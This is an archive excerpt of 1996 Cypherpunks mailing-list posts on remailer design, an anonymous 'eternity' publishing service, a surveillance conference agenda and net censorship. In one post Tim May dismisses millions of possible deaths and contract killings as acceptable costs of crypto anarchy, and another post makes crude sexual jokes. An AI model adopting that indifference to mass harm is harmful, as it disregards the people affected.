3/5/96: Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) announce encryption bills
(S.1587/H.R.3011) that significantly relax export restrictions on products
with encryption functionality in them, as well as free public domain software
such as PGP (Pretty Good Privacy).

________________________________________________________________________
FOR MORE INFORMATION / SUPPORTING ORGANIZATIONS

There are many excellent resources online to get up to speed on crypto
including the following WWW sites:

http://www.crypto.com       http://www.privacy.org    http://www.eff.org    
http://www.cdt.org          http://www.epic.org       http://www.vtw.org

Please visit them often.

The following organizations have signed onto this alert:

	Center for Democracy and Technology
	Electronic Frontier Foundation
	Electronic Privacy Information Center
	Voters Telecommunications Watch

________________________________________________________________________
End alert
========================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 9 Sep 1996 09:50:55 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks subscribers - Singapore and NZ gvts, plus IRS
Message-ID: <199609082254.WAA04422@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May, among others, often reminds that the list is wide open to all
comers, from whatever domain. I'm happy to see the diverse range of
domains, especially those I snoop for good alt.sex.bestiality pix, er,
classified data. 
 
 
The sg, gov and mil sites offer best of show sexual defectives. 
 
 
Beloved IRS is still a bit touchy about snooping its vast sewer of
exon-oddities, though, so don't leave a mess when you've finished ogling
Tim's. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Mon, 9 Sep 1996 16:21:35 +0800
To: cypherpunks@toad.com
Subject: Re: strengthening remailer protocols
In-Reply-To: <9608231805.AA01523@clare.risley.aeat.co.uk>
Message-ID: <v03007816ae5962ce3cb6@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:25 PM -0700 9/2/96, John Anonymous MacDonald wrote:
>I don't really see the use of this complicated scheme.  The main
>problem seems to be that if M floods remailer R with messages to B,
>and A sends a message to C through R, then it will be clear to M that
>A's message was destined for C.
>
>Rather than divert messages, then, I propose that for each input
>message there is a 10% chance that a piece of cover traffic is
>generated.  Thus, if M sends 50 messages through R and sees 6 outgoing
>messages going to remailers C, D, and D, he will now know which
>messages correspond to the message that A send through.

I quite like this load based cover traffic scheme. Another defense against
flood is to slow the rate at which the messages leave the system. A simple
modification to Mixmaster (which will be in the next version) is to have an
exponential pool. The operator sets two parameters, a minimum pool size,
and a fraction of messages to send each time the pool is processed. 10
messages and 10% seem like good settings to me. Given at least one cover
message each time the pool is processed, flooding is much less productive.

A side benefit of this system is a reduction in the load on the sendmail
system during a flood or spam.

	-Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Mon, 9 Sep 1996 16:36:25 +0800
To: cypherpunks@toad.com
Subject: Re: strengthening remailer protocols
In-Reply-To: <ae50bfcc03021004f4a7@[207.167.93.63]>
Message-ID: <v03007817ae5963e47e23@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


Mixmaster prevents replay, so flooding multiple copies of a single message
will not work. This is the reason Mixmaster has no reply block feature. I
can see two ways in which replies can work safely.

One time reply blocks. Each block is used once and only once. Each routes
separately, and the creator never deploys enought to allow a good trace (no
more than 5 in existence at any one time). They would probably need to be
managed by some kind of nym-server. They have the disadvantage of allowing
denial of service by simply using up all the available reply blocks. The
block also point back to the sender (as all reply blocks must). This allows
an attack to rubber hose each operator in succession at the attacker's
leasure. Normal chains contain no information about where they have been,
so interception and cooperation must happen in real time (much more
difficult).

The other solution is message pools. I think this will turn out to be the
only really secure and reliable system. Some sort of automated use of pools
by remailers (so the user need not do so directly) might be possible. I
designed such a system several months back, with little response.

At 4:50 PM -0700 9/2/96, Timothy C. May wrote:
>This type of attack is why "reply-block" schemes are fundamentally flawed.
>Any such scheme gives an attacker (a traffic analyst) a wedge with which to
>deduce mappings. It is a kind of "chosen plaintext" attack (loosely
>speaking). Or a "forcing attack." Maybe a "flooding attack" is as good a
>name as any. One floods the reply block and simply watches where the water
>goes.
>
>(If there were more academics in the crypto community looking at digital
>mix issues, there would likely be clever names for the various attacks.)
>
>Several folks on this list, including (from memory), Scott Collins, Wei
>Dai, Hal Finney, myself, and others, have noted this weakness over the
>years.
>
>Note that merely fiddling around with probabilities of transmission, such
>as described above, will not be enough. This just adds a layer of noise,
>which will disappear under a correlation analysis.
>
>(For newcomers, there are interesting parallels between statistical
>analysis of ciphers and similar analysis of remailer networks. And lots of
>statistical tools can be used to deduce likely mappings based on
>source/sink correlations, digram analysis, etc. Making a remailer network
>robust against such analyses will take a whole more basic thinking. Merely
>increasing message volume is not enough. Nor is increasing latency enough.
>Generally speaking, of course.)
>
>Instead of reply blocks, I think use of message pools (a la BlackNet) is a
>more robust reply method, as it uses "widely-distributed messages" (a la
>Usenet newsgroups) to get around the source/sink correlation issue.
>
>--Tim May
>
>
>We got computers, we're tapping phone lines, I know that that ain't allowed.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Licensed Ontologist         | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."


----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blak Dayz <102540.2453@CompuServe.COM>
Date: Tue, 10 Sep 1996 15:34:46 +0800
To: CypherPunks <cypherpunks@toad.com>
Subject: Satellite Movement?
Message-ID: <960909031224_102540.2453_HHV82-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


	I was out buying groceries and after they scanned the shit through they
told me that all the ATMs in the City were out due to connection problems. So i
go home and start trying to scan for the shits and i cant find them. If anyone
knows what the hell happened i would appreciate the details. I believe it may
have been a solar flare that caused the companies to redirect their satellites.
It would do me alot of help considering i had to pay CASH (i hate paper) for the
stuff and i would like to complain to the fucking JPL and satt. operators about
them warning the public.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 9 Sep 1996 11:22:49 +0800
To: cypherpunks@toad.com
Subject: towards an eternity service
Message-ID: <199609082212.XAA00383@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



[the relevance of this to remailer-operators, is that my example
prototype architecture for discussion relies heavily on mixmaster
remailers]

Ross Anderson's eternity service (postscript paper somewhere on
http://www.cl.cam.ac.uk/~rja14/) is a distributed file system with the
criteria that it should not be possible to delete information from it.
The paper outlines ways that you might go about doing this, and gives
as a design goal that it should not be possible even for concerted
government attacks to remove information from the service.  Roughly
the approach described is to have anonymous servers with secret shared
data.  The server doesn't know what it is serving, and the server
charges per Mb/year of data storage.

This seems a pretty interesting idea, as it would be a great boon to
free speech to be able to reliably publish information that would
survive attempts to "unpublish" it, which seem to be gaining in
popularity.  Notable recent examples of such attacks being
Scientologist attacks on distribution of it's `scriptures', the German
governments banning of nazi revisionist material, and the impending
possibility of a repeat of the CDA at a (US) state level.

I think it is desirable to get something working now, even if it is
far short of the design criteria Anderson describes.  A working model
would provide something on which to base discussion of improvements,
and would also be an interesting experiment to see the sorts of uses
such a system would be put to, and the political reaction to it's
uses.

The following doesn't depend on, but would be helped by having direct
socket delivery of packets (for performance) in the mixmaster
remailer-net and forward secrecy (for resilence to attack).

The idea comes in two parts, the first part, an anonymous www proxy
using mixmaster to deliver packets, is present to provide cover
traffic for real eternity system requests, the second part describes a
way to acheive an eternity like system with the traffic mixed in with
part 1 traffic, so that the two types of traffic can not be
distinguished by attackers.

1. anonymous www proxies over mixmaster

The stated design goal for this part (it's partly a cover goal, though
useful in its own right) is to ensure that users can access publically
accessible www pages without divulging their identity to the sites
they are accessing, or even to an attacker who is monitoring net
traffic.  The user wants to hide which sites they are accessing, and
what information they are accessing.  No attempt is made to conceal
the identity of the www sites accessed, a normal URL is used to access
them.  This is basically just like www.anonymizer.com, except that
traffic is routed over the mixmaster net.

An http <-> mixmaster interface would be added to the existing
mixmaster.  You add a blip in the line for outgoing traffic on your
own machine which converts all outgoing http requests into mixmaster
packets and feeds them into the remailer network.  You choose random
chains to get to the http servers.  The delivered packet at the exit
remailer node is a new mixmaster packet type, a http request type,
rather than a request to email to an individual, or post to a
newsgroup, it results in an (where possible SSL encrypted) http
request being made to the specified http server.

Also included with the request is a mixmaster reply chain, so that the
exit mixmaster node can route the return the requested www pages, and
SSL session traffic back to the originator.

As you might imagine if this became popular, it could generate a lot
of traffic.  For a practical system I think it's inevitable that you'd
need to provide some financial incentive for the mixmaster operators
to subsidize their T3s :-) So you would need to incorporate per hop
payments, for the remailers.  This could be a relatively small payment,
but is just there to ensure that they have the money to increase their
bandwidth if the demand requires it.

I think that about explains part 1.

2. an eternity like system built on this system

There are a couple of extra requirements for the eternity system,
firstly that the address of the www site must be concealed also, and
secondly that the data is secret shared across multiple eternity www
sites.

The first requirement can be met by the anonymous eternity www sites
publically posting to a newsgroup (via a mixmaster remailer of
course:-) a mixmaster chain pointing at themselves.

To reduce the problem of the flood attack for finding the endpoint of
a chain, firstly some of Peter Allan's suggestions on extra cover
traffic, and on adding extra hops to increase cover traffic should
help, but ultimately this only makes a longer concerted flood
necessary to find the output.

I don't see any easy solution to the flood attack, the only _real_
answer is a DC net.  A slightly simpler, but less robust solution
would be to find ways to have fixed levels of traffic between nodes in
the remailer network.  Surplus traffic at entry points could be
rejected, so that the sender knows to try another remailer.

The other requirement for eternity is that the data should be secret
shared.

If all the eternity www servers publish their reply blocks, the user
sends requests to a number of the eternity servers selected randomly.
Choose the number so that it is likely that you will get the required
k of n shares, given that there are n servers, and they all hold
shares in the data, and that k of n shares are required to recover the
secret.

You also need to ensure that the exit mixmaster which is acting as a
http forwarder server can't tell whether it is making an eternity
system request or an anonymous www proxy request.  The fact that http
traffic is blindly forwarded means that if the http request is SSL
encrypted the http forwarding mixmaster remailer will not know the
contents of the traffic, and so will not be able to distinguish
traffic type: eternity or anonymous proxy.

As the eternity www servers don't know what the data in the shares
they are holding is, they can't provide the indexing facility
directly.  Rather ordinary www pages, and other eternity www pages can
be used to collect links to interesting eternity pages.  In
otherwords, it's decentralised, as is the www, and any indexing left
up to the authors of eternity hosted www documents, or anyone elses
indexing to interesting links.

A compromise technology which would greatly simplify access to the
service would be public www proxies or gateways to the eternity
service, so that no new software was required for the client.  This
would serve a similar role to WWW based remailers.

The scheme is complex in places but basically requires no new
technology, at least for a crude implementation, without the finer
points.

What can be missed out in a first pass implementation, and deferred
for later incremental improvements:

	ecash postage to pay for remailer resources
	fixed traffic between remailers
	payment for www sites (anonymous www proxy and eternity service)
	oblivious transfer to setup shares

so that leaves the following to be done:

	blip in the line which routes http requests over mixmaster
	mixmaster reply chains for return http traffic
	secret sharing of data to send to eternity www servers
	periodic posting of mix reply blocks by eternity www servers
	public access www proxy, or www-cgi based gateway

comments, volunteers?

Adam
--
exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Mon, 9 Sep 1996 16:01:16 +0800
To: "Privacy International" <pi@privacy.org>
Subject: AST Final Agenda
Message-ID: <n1369897001.39121@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

I hope you will be able to join us for our conference in Ottawa next week.
Here is the final agenda.

Dave

                                  PROGRAM

               ADVANCED SURVEILLANCE TECHNOLOGIES CONFERENCE II

                                Sponsored by

                            Privacy International
                     Electronic Privacy Information Center

                             September 16, 1996
                                    
                   Citadel Ottawa Hotel and Convention Centre
                                Ottawa, Canada


9:00 am COFFEE AND REGISTRATION

9:30 am WELCOME AND INTRODUCTION:  NURTURING THE SURVEILLANCE SOCIETY

Advanced surveillance functions have become an integral part of widescale
information systems used by governments and businesses. Monitoring of the
activities of individuals is seen as a  desirable - and often technically
essential - componennt in many of these  systems. Once regarded as
purpose-built stand alone innovations, the modern surveillance device for
identification, profiling or tracking has been re-invented as a tool for
commercial leverage. In these introductory remarks, Simon Davies and Dave
Banisar explores the key technical, political, cultural and legal changes
that are nurturing the growth of surveillance technologies across the
world.

        o Simon Davies, London School of Economics & Director General, Privacy
International

        oDave Banisar, Electronic Privacy Information Center & editor,
International Privacy Bulletin

10:15 am FEATURED SPEAKER:  SURVEILLANCE TECHNOLOGIES OF THE INTELLIGENCE
AGENCIES

What kinds of technologies are the intelligence agencies of the world
using? Who are they using it against? Are they legally accountable for
their actions? Mike Frost, a former spy for the Canadian Security
Establishment will talk about his experiences using these technologies to
spy on Canadian citizens and the relationship of the CSE to the US National
Security Agency.

        o Mike Frost, Former Intelligence Officer, Canadian Communications
Security Establishment & author, Spyworld

11:00 am BREAK

11:15 am SURVEILLANCE AND THE INTERNET 

SIGINT ONLINE: GOVERNMENT SIGNALS INTELLIGENCE ON THE NET
        o Wayne Madsen, Author, Handbook of Personal Data Protection

>From Fort Meade, Maryland to Cheltenham, England and from Canberra,
Australia to Issy les Moulineaux in Paris, signals intelligence (SIGINT)
specialists are honing their skills at monitoring digital information.
SIGINT agencies everywhere are increasingly throwing their surveillance web
over the Internet and other data networks of interest. This session shall
examine the methods by which SIGINT agencies conduct such on-line
intelligence-gathering activities, including manipulation of encryption
systems to exploiting weaknesses in communications architectures, including
the use of anonymous remailers, rigging encryption systems, and tampering
with the simple network management protocol (SNMP). You will discover that
Mae West is more than just a deceased movie star.


Datamining the Net: Cookies, Crawlers and Trackers
        o Simson Garfinkel, author, Practical Unix and Internet Security and
PGP: Pretty Good Privacy.

A great deal of information is gathered on individuals on the Internet.
>From Alta Vista to cookies to digital cash to Web Crawler, sophicated tools
to collect, index and process this information are being developed.  Simson
Garfinkel will discuss these technologies, what information is being
gathered and what is being done with it.


12:30 pm  LUNCH (provided)

1:30 pm CONSUMERS AND SURVEILLANCE

 INTELLIGENT VEHICLES AND TRACKING

Phil Agre will outline the remarkable variety of technologies of
surveillance currently being planned or implemented for road travel. The
motivations for these systems are numerous and include logistics, traffic
management, law enforcement, pollution control, and marketing. Despite the
diversity of motivations, certain unifying themes emerge. The vast majority
of the functionalities provided by these systems can be provided
anonymously.

        o Phil Agre, University of California, San Diego

GENETICS AS A SURVEILLANCE IDEOLOGY

Researches in the field of genetics are still largely dominated by the
works of molecular biologists who tend to comprehend reality through the
classical Cartesian-Newtonian paradigm which postulates that it is possible
to reduce the universe to a mechanical model in which peticular effects can
be described as the direct results of specific causes. Such an approach
does not acknowledge the fact that human physical and mental health is the
result of very complex interactions. Most illnesses and deviant behaviors
are multifactorial (physical and social environments are at least as much
important as the genetic factors) and polygenic (numerous genes could be
involved). In short, there are large  probabilities that an individual
carrying many "defective" genes may never develop the corresponding
illness. Unfortunately, such fields of activities such as risk management,
insurance, law and policy-making also work mostly within the
Cartesian-Newtonian paradigm. In such a context, genetics can easily be
transformed into an ideological justification for surveillance and social
control of populations or individuals "at risk" as well as minimizing
social and environmental responsabilities.

        o Pierrot Peladeau,  Progesta Inc. & editor Privacy Files

2:45 pm BREAK

3:00 pm SOLUTIONS: PROTECTING PRIVACY IN SURVEILLANCE SOCIETIES

A PRIVACY COMMISSIONER CASE STUDY: INTRODUCTION OF A DNA PROFILE DATABANK TO 
NEW ZEALAND

Bruce Slane, Privacy Commissioner of New Zealand, will outline aspects of a
new law which came into force in New Zealand last month. The law sanctions
the establishment of a DNA profile database for police use in criminal
investigations. The law also spells out how blood samples may be obtained
from suspects for DNA analysis - voluntarily, by court order, and
ultimately by force if need be. Bruce will explain the role of a Privacy
Commissioner in scrutinising laws increasing state surveillance using the
DNA law as a case study.

        o Bruce Slane. New Zealand Privacy Commissioner

CAN PRIVACY STANDARDS ACHIEVE EFFECTIVE DATA PROTECTION?

Privacy standards are becoming an important feature of the privacy
protection landscape.  The CSA Model Code for the Protection of Personal
Information is likely to followed by other attempts to negotiate standards
in other countries and at the international level.   What are the market
and regulatory incentives for the adoption of privacy standards?   Can
privacy standards exist alongside data protection legislation?  What are
the minimum requirements for a registration/accreditation system for a
privacy standard?

        o Colin Bennett, University of Victoria

4:30 pm WRAPUP


----------------------------------------------------------------------------

MORE INFORMATION

More information on the conference will be available at the Privacy
International mailing list at pi-news@privacy.org (subject: subscribe) or
at the PI Home Page at http://www.privacy.org/pi/conference/ottawa/

----------------------------------------------------------------------------

REGISTRATION

Registration Fees

[] Standard - $250 CAN ($175 US)
[] Non-profit organizations/Educational - $125 CAN ($75 US)

Information

Name:     ___________________________________________________________

Organization:  ______________________________________________________

Address:    _________________________________________________________
 
   __________________________________________________________________

Phone/Fax:  _________________________________________________________

Electronic Mail:_____________________________________________________

Credit card Number/Expiration Date: _________________________________
 (Your credit card will be billed by "Diane Publishing" - Do Not Email!)

First Virtual Account (include email address)_________________________


Fax Registration form and credit card number to +1 202.547.5482

Send Check or Money Order in $US made out to Privacy International to:

        Privacy International Washington Office
        666 Pennsylvania Ave, SE, Suite 301
        Washington, DC 20003 USA
        1-202-544-9240 (phone)
        1-202-547-5482 (fax)
        pi@privacy.org(email)

----------------------------------------------------------------------------

Privacy International was formed in 1990 as a watchdog on surveillance by
governments and corporations.  With members in more than 40 countries, it
has created an international movement that has helped to counter abuses of
privacy by way of information technology. Privacy International has
conducted campaigns in Europe, Asia and North America to raise awareness
about the dangers of ID card systems, military surveillance, data matching,
police information systems, and credit reporting.  It is based in London,
UK, and is administered by the Electronic Privacy Information Center (EPIC)
in Washington, D.C. Privacy International  publishes a quarterly newsletter
(the International Privacy Bulletin) and organizes conferences each year on
privacy and technology. More information is available at
http://www.privacy.org/pi/

The Electronic Privacy Information Center is a public interest research
center in Washington, DC. It was established in 1994 to focus public
attention on emerging privacy issues relating to the National Information
Infrastructure, such as the Clipper Chip, the Digital Telephony proposal,
medical record privacy, and the sale of consumer data. EPIC is sponsored by
the Fund for Constitutional Government, a non-profit organization
established in 1974 to protect civil liberties and constitutional rights.
EPIC publishes the EPIC Alert, pursues Freedom of Information Act
litigation, and conducts policy research. For more information, email
info@epic.org, HTTP://www.epic.org or write EPIC, 666 Pennsylvania Ave.,
SE, Suite 301, Washington, DC 20003. +1 202 544 9240 (tel), +1 202 547 5482
(fax).









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 9 Sep 1996 14:48:52 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Cypherpunks subscribers - Singapore and NZ gvts, plus IRS
In-Reply-To: <199609082254.WAA04422@pipe3.t1.usa.pipeline.com>
Message-ID: <Pine.SUN.3.91.960908234237.28774C-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Actuall I do have one user subscribing to my filtered list from the irs. :)

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to   |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK   |AK|        do you not understand?       |=======
===================http://www.brainlink.org/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 9 Sep 1996 17:02:44 +0800
To: cypherpunks@toad.com
Subject: Erasing Disks, was Re: What the NSA is patenting
Message-ID: <199609090702.AAA12702@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


See Peter Gutmann's paper, "Secure Deletion of Data from Magnetic and
Solid-State Memory" in The Sixth USENIX Security Symposium Proceedings.

My feeling after hearing his paper was that the only thing I would trust
was thermite.


-------------------------------------------------------------------------
Bill Frantz       | "Lone Star" - My personal  | Periwinkle -- Consulting
(408)356-8506     |  choice for best movie of  | 16345 Englewood Ave.
frantz@netcom.com |  1996                      | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 02:17:56 +0800
To: cypherpunks@toad.com
Subject: China joins Singapore, Germany, ....
Message-ID: <ae5982b111021004f38b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



CNN is presenting coverage of China's decision to pull the plug on more
than 100 sites, and issuing a list of sites which are illegal to connect
to.

(Net censorship is getting to be a big story....when the list of countries
reaches 15, it will of course no longer be news. And when the United States
block access, this will all be transmogrified into an "Anti-Terrorist
Action.")

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 03:30:43 +0800
To: cypherpunks@toad.com
Subject: Re: Conservation Laws, Money, Engines, and Ontology
Message-ID: <ae5983cb1202100435c4@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:03 AM 9/9/96, Greg Kucharo wrote:
>  One thing that occurs here.  I imagine a scenario where you have a
>"share" of resources on a system(and ISP for example).  You're metered as
>to how much you can post or store.  Actually as it is now posting is
>regulated through extra payments per meg above the limit.  Spam is being
>somewhat regulated by Terms of Service type things, but my point is what is
>to prevent pooling resources among several system to achive the same Spam
>pursuits some have.  Say for example that an individual gets several
>accounts to balance the load at thier point.  The Usenet for example has no
> "choke point".  How could ISP's apply conservation here?  If you limit the
>amount of traffic you still aren't holding back the flow of "spam".
>  Here's where reputations could come in.  You cound't open a new account
>anywhere without a good "reputation".  This could aid in balancing the load
>of certain people.

The most basic principle is this: those with resources they control (and
"own") set the rates and policies.

We don't have to figure out how the pricing will ripple down the line, or
whether what some call "spam" will be controlled.

(My view is that the whole focus on "spam" has been singularly unfruitful.
We don't call magazine or television advertising "spam," though it meets
operational definitions of spam, or velveeta, or whatever the latest terms
is. While much advertising is disgusting, unwanted, noisome, etc., we
understand that the publisher of a magazine can choose what to include and
we can choose whether to buy it or not. (Television and radio are somewhat
different, due to the FCC licensing and limited bandwidth, but the
principle is the same.))

Thus, when carriers of packet traffic begin market pricing of packets, the
pricing will ripple back. Eventually. (Or not, should some steps in the
chain decide not to pass on costs...)

I expect the failure of the Internet to have proper conservation laws to be
solved in this way:

Removal of Market Distortions + Auctioning Mechanisms + Several Large
Network Crashes = A More Rational Market Model for Network Usage

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 03:38:53 +0800
To: cypherpunks@toad.com
Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati
Message-ID: <ae59868c13021004db98@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:04 AM 9/9/96, Enzo Michelangeli wrote:

>I and you may well choose to do so, but the vast majority of the human
>beings believe just anything that is repeated loud and long enough.
>Otherwise, nobody would hire PR and pay for advertisement, politicians
>wouln't be fedwith taxpayer's money, Bosnians would trade goods instead
>of gunshots, etc. I'm personally not interested in conjuring up the latest
>utopia for a minoritarian sect of illuminati: I need to live in the real
>world, and push for viable solutions that change it for better, now.

Yes, Bosnians and Serbs would not be killing each other if only they could
receive government-approved information!

(Hint: This shows that neither governments nor churches nor the United
Nations knows any better solutions to the "who do you trust" problem. And,
I believe, mostly governments and other such entities exist to serve their
own interests.)

As to what I presume is an insult to the folks on this list ("I'm
personally not interested in conjuring up the latest utopia for a
minoritarian sect of illuminati"), you know where the exit is.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 03:43:07 +0800
To: cypherpunks@toad.com
Subject: Re: Voluntary Disclosure of True Names
Message-ID: <ae5989541402100482e4@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:18 AM 9/8/96, James A. Donald wrote:
>At 10:49 AM 9/5/96 -0700, Vladimir Z. Nuri wrote:
>> I have seen it repeated here often that somehow anonymity is some kind
>> of a "right" that one should have in all kinds of different & important
>> transactions, not merely on "cyberspace debate societies". I see
>> here frequently the implication that *private*entities* that want to
>> enforce identity in their own transactions are somehow implementing
>> a corrupt, orwellian system.
>
>We hold that private entities have the right to attempt to impose corrupt
>orwellian systems provided they do not do it at gunpoint, but we doubt
>that they will succeed without guns.

An overstatement which diminishes the power of your arguments.

Namely, many, many corporations have Orwellian surveillance systems and
policies which would be unacceptable if imposed by a government. No guns
are involved, only the considerations of employment, paychecks, and the
like.

Likewise, many private schools have such systems. Likewise, no guns are
involved.

And so on.

(Naturally, I am not criticizing these voluntarily-entered-into
arrangements, merely rebutting the point that people will generally not put
up with Orwellian schemes unless threatened with guns.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 04:32:47 +0800
To: cypherpunks@toad.com
Subject: Re: [WAS xs4all.nl] Terrorists
Message-ID: <ae598c7d1502100440f6@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 AM 9/9/96, Jon Lebkowsky wrote:
>At 11:01 AM 9/9/96 +0200, Stephan Schmidt wrote:
>
>>One thought : How many of you would support terrorist
>>web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?
>
>I.e. "How many of you support the right to free speech regardless of content."
>
>Wellll...there is the rule about speech which endangers; "fire in a crowded
>theatre" is the cliche-example. What could a terrorist SAY that would
>endanger? Personally, I'd rather have terrorists building html than bombs.

As Dettweiler is usually so fond of pointing out, it would be disingenuous
of us not to acknowledge that the systems we are talking about (fully
untraceable, strong anonymity, digital pseudonyms, digital cash,
information markets, i.e., "crypto anarchy") will in fact be used for all
sorts of things. Including folks who want to blow up Parliament, the
Congress, the People's Tribunal, etc.

And by folks who wish to trade in CBW secrets, who wish to arrange contract
killings, and so on.

This has been well-known for many years. My paper on "Crypto Anarchy and
Virtual Communities" was villified by no less than Dorothy Denning for
describing how these things may evolve.

I don't worry overmuch about a few thousand or even a few million people
dying as a result of something we have had an influence on developing,
anymore than the developers of many technologies need to worry about how
others use their technologies.

And the net effect of crypto anarchy is to destabilize and marginalize
central governments, which is a net positive effect. If some eggs get
broken in the process, the biological imperative will generate more eggs.
No big deal.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DAVID A MOLNAR <molnard1@nevada.edu>
Date: Mon, 9 Sep 1996 19:29:39 +0800
To: dh-l@lists.io.com
Subject: Distributed data haven monetary supply?
Message-ID: <Pine.OSF.3.91.960909010504.1677A-100000@pioneer.nevada.edu>
MIME-Version: 1.0
Content-Type: text/plain


	When writing about Eternity services or other distributed data havens, 
